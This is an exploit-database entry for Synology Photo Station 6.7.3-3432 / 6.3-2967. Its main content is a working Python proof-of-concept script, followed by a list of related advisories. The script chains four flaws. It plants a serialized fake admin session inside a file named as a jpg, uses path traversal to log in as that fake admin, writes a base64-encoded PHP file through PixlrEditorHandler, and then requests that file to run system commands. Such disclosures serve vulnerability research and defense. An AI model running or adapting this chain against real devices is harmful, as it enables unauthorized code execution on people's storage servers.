Lucene search
Kacper SzurekEDB-ID:42434HistoryAug 08, 2017 - 12:00 a.m.
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-08-0800:00:00
Kacper Szurek
www.exploit-db.com
41
AI Score
7.4
Confidence
Low
'''
Source: https://blogs.securiteam.com/index.php/archives/3356
Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:
Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests
# What server you want to attack
synology_ip = 'http://192.168.1.100'
# Your current IP
ip = '192.168.1.200'
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text
print "[+] Login as fake admin"
# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text
print "[+] Upload php file"
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text
print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
print f.textRelated
seebug
seebug
Synology Photo Station Unauthenticated Remote Code Execution
2017-08-08 00:00:00
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-09-29 00:00:00
packetstorm
packetstorm
Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution
2017-08-08 00:00:00
zdt
zdt
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution Exploit
2017-08-08 00:00:00
openvas
openvas
Synology Photo Station Multiple Vulnerabilities
2017-08-15 00:00:00
Synology Photo Station Detection
2015-05-26 00:00:00
cvelist
cvelist
nvd
nvd
cve
cve
prion
prion
Information disclosure
2017-08-08 15:29:00
Authentication flaw
2017-08-08 15:29:00
Deserialization of untrusted data
2017-08-08 15:29:00
checkpoint_advisories
checkpoint_advisories
Synology Photo Station Arbitrary File Upload (CVE-2017-11151) - Ver2
2018-04-22 00:00:00